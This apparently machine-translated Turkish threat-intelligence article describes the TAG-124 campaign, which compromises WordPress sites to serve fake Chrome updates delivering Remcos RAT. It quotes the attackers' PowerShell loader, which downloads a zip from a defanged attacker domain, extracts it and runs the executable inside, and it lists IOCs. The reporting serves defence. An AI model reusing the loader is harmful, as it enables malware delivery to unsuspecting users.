TAG-124 tehdit grubu tarafından düzenlenen gelişmiş bir siber kampanya, kötü amaçlı yükler dağıtmak için 1000’den fazla WordPress web sitesini tehlikeye attı.
Operasyon, kullanıcıları kötü amaçlı yazılımlarla enfekte etmek için çok katmanlı bir trafik dağıtım sisteminden (TDS) yararlanır ve ileri kaçaklama taktikleri ve altyapı yönetimi gösterir.
TAG-124’ün altyapısı, ziyaretçileri saldırgan kontrollü yük sunucularına yönlendirmek için kötü amaçlı JavaScript ile enjekte edilen tehlikeye atılmış WordPress sitelerinden oluşur.
.webp)
Bu sunucular, sahte Google Chrome güncellemeleri gibi meşru yazılım güncellemeleri olarak gizlenmiş kötü amaçlı yazılımlara ev sahipliği yapar.
%20and%202%20(right)%20(Source%20-%20Recorded%20Future).webp)
Merkezi bir yönetim paneli, saldırganların URL’leri, mantık ve enfeksiyon taktiklerini kontrol etmesini ve güncellemelerini sağlar ve dinamik ve uyarlanabilir saldırı stratejilerini mümkün kılar.
.webp)
Insikt Group’taki araştırmacılar, Future’ın Tehdit Araştırma Bölümü’nü kaydetti, kullanıcılar aşağıdakiler gibi kötü amaçlı komut dosyalarıyla gömülü tehlikeye atılan WordPress sitelerini ziyaret ettiğinde saldırının başladığını belirtti:-
Bu komut dosyası, saldırgan kontrollü alanlardan dinamik olarak ek kaynaklar yükler. Tag-124 sıklıkla dosya adlarını değiştirir (örn. metrics.js- hpms1989.js) ve url'ler algılamadan kaçınır.
Yük dağıtım
Belirli koşulları (coğrafi konum veya tarayıcı türü) karşılayan ziyaretçiler, meşru yazılım güncellemelerini taklit eden sahte açılış sayfalarına yönlendirilir. Örneğin:-
Update Chromeİndirilen dosya, Release.zipRemcos Remote Access Trojan (RAT) gibi kötü amaçlı yazılım içerir. Aynı etki alanında barındırılan bir PowerShell betiği kötü amaçlı yazılım kurulumunu otomatikleştirir:
$webClient = New-Object System.Net.WebClient
$url1 = "https://update-chronne[.]com/Release.zip"
$zipPath1 = "$env:TEMP\mgz.zip"
$webClient.DownloadFile($url1, $zipPath1)
Expand-Archive -Path $zipPath1 -DestinationPath "$env:TEMP\file"
Start-Process -FilePath "$env:TEMP\file\Set-upx.exe"TAG-124, aşağıdakiler gibi gelişmiş teknikler kullanır:-
- ClickFix Tekniği: Kullanıcıları önceden belirlenmiş komutları yürütmelerini isteyen diyalogları görüntüler.
- Dinamik URL güncellemeleri: Meydan okulu sitelerdeki URL'leri ve dosya adlarını düzenli olarak değiştirir.
- TDS'de koşullu mantık: Enfeksiyonları optimize etmek için ziyaretçi özelliklerine dayalı trafiği filtreler.
Kampanya, TAG-124'ün ilk enfeksiyon zincirleri için altyapısını kullanan Rhysida ve Interlock da dahil olmak üzere birden fazla fidye yazılımı grubuna bağlandı. Bu TDS'nin paylaşılan kullanımı, siber suçlu gruplar arasında işbirliğini vurgulamaktadır.
Benzer saldırılara karşı korumak için, WordPress Core'u, eklentileri ve bilinen güvenlik açıklarını yamaya güncellenen temaları saklayın ve yetkisiz JavaScript enjeksiyonları için düzenli olarak tarayın.
Web uygulaması güvenlik duvarlarının (WAF) uygulanması, kullanıcıları doğrulanmamış kaynaklardan yazılım güncellemelerini indirme riskleri konusunda eğitirken, savunmasız uç noktaları hedefleyen kötü amaçlı trafiği engellemeye yardımcı olur.
Uzlaşma Göstergeleri (IOCS)
Saldırıda kullanılan anahtar alanlar ve IP'ler şunları içerir:-
- Alanlar:
vicrin[.]com-update-chronne[.]com - IPS:
146.70.41[.]191-45.61.136[.]67
Tazmin edilmiş WordPress siteleri, aşağıdakiler gibi yüksek profilli alanlar içerir: www[.]ecowas[.]int Ve www[.]reloadinternet[.]com.
Collect Threat Intelligence with TI Lookup to Improve Your Company’s Security - Get 50 Free Request